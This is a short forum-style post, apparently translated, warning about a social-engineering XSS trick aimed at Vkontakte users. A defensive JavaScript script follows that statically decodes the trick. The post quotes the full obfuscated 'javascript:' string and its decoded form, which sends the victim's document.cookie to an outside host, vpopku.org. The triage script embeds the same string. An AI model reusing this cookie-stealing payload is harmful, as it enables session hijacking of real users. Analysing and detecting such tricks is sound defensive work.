Even with the holes on Vkontakte closed, XSS can still be arranged.
The other day I was invited to add a "Vkontakte" application. Curiosity won out, and I took a look. Here is what I saw: the string is long, so it did not fit in the input field. I will give it in full:

javascript:page=String.fromCharCode(105,109,103,61,110,101,119,32,73,109,97,103,101,40,41,59,105, 109,103,46,115,114,99,61,39,104,116,116,112,58,47,47,118,112,111,112,107,117,46,111,114,103,47,115,117,112,47, 115,46,112,104,112,63,113,61,39,43,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,59); eval(page); alert(unescape("%u041D%u0435%20%u0443%u0434%u0430%u0435%u0442%u0441%u044F%20%u0432%u044B%u043F%u043E%u043B%u043D%u0438%u0442%u044C%20%u0434%u0435%u0439%u0441%u0442%u0432%u0438%u0435%21"));
This is all pretty trivial: first, a script is executed that sends the user's cookies to the attacker:

img=new Image(); img.src='http://vpopku.org/sup/s.php?q='+document.cookie;
Then the user gets an alert with the message: “Can't do the action!” Seeing that, the user, although disappointed, suspects nothing and closes the application.
So I want to say again that even if all the security holes on a site are closed, there will always remain the most effective method of all time: social engineering.
P.S. This is the first time I have encountered this particular combination of social engineering and XSS. If this is a repeat, my apologies.
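A defender's static triage of a pasted string like the one above, as an added example that is not part of the original post: it decodes the `String.fromCharCode` and `unescape` layers without calling `eval` and reports what the hidden code touches. The function names (`decodeCharCodes`, `decodeUnescape`, `triage`) are illustrative, and the sample input is the string quoted in the post.

```javascript
// Added example: static triage of a pasted "javascript:" string. Nothing is eval'd.
// SAMPLE is the string quoted in the post; all function names are illustrative.
const SAMPLE =
  'javascript:page=String.fromCharCode(105,109,103,61,110,101,119,32,73,109,97,103,101,40,41,59,105, ' +
  '109,103,46,115,114,99,61,39,104,116,116,112,58,47,47,118,112,111,112,107,117,46,111,114,103,47,115,117,112,47, ' +
  '115,46,112,104,112,63,113,61,39,43,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,59); ' +
  'eval(page); alert(unescape("%u041D%u0435%20%u0443%u0434%u0430%u0435%u0442%u0441%u044F%20' +
  '%u0432%u044B%u043F%u043E%u043B%u043D%u0438%u0442%u044C%20%u0434%u0435%u0439%u0441%u0442%u0432%u0438%u0435%21"));';

// Decode String.fromCharCode(...) calls whose arguments are all numeric literals.
function decodeCharCodes(src) {
  const out = [];
  for (const m of src.matchAll(/String\.fromCharCode\(([\d\s,]+)\)/g)) {
    const codes = m[1].split(',').map(s => s.trim()).filter(Boolean).map(Number);
    out.push(String.fromCharCode(...codes));
  }
  return out;
}

// Decode unescape("...") literals (%uXXXX and %XX) without calling unescape().
function decodeUnescape(src) {
  const out = [];
  for (const m of src.matchAll(/unescape\(\s*(["'])(.*?)\1\s*\)/g)) {
    out.push(m[2].replace(/%u([0-9a-f]{4})|%([0-9a-f]{2})/gi,
      (_, u, b) => String.fromCharCode(parseInt(u || b, 16))));
  }
  return out;
}

// Report what the string does once its encoded layers are made readable.
function triage(src) {
  const decoded = decodeCharCodes(src);
  const all = [src, ...decoded].join('\n');
  return {
    isJavascriptUrl: /^\s*javascript:/i.test(src),
    usesEval: /\beval\s*\(/.test(all),
    decoded,                                  // hidden source passed to eval
    messages: decodeUnescape(all),            // decoy text shown to the user
    readsCookie: /document\.cookie/.test(all),
    hiddenFromPlainSearch: !/document\.cookie/.test(src),
    urls: all.match(/https?:\/\/[^\s'"]+/g) || [],
  };
}

console.log(triage(SAMPLE));
```

The `hiddenFromPlainSearch` flag shows why a plain-text filter for `document.cookie` on the raw string misses this: the reference only appears after the character codes are decoded.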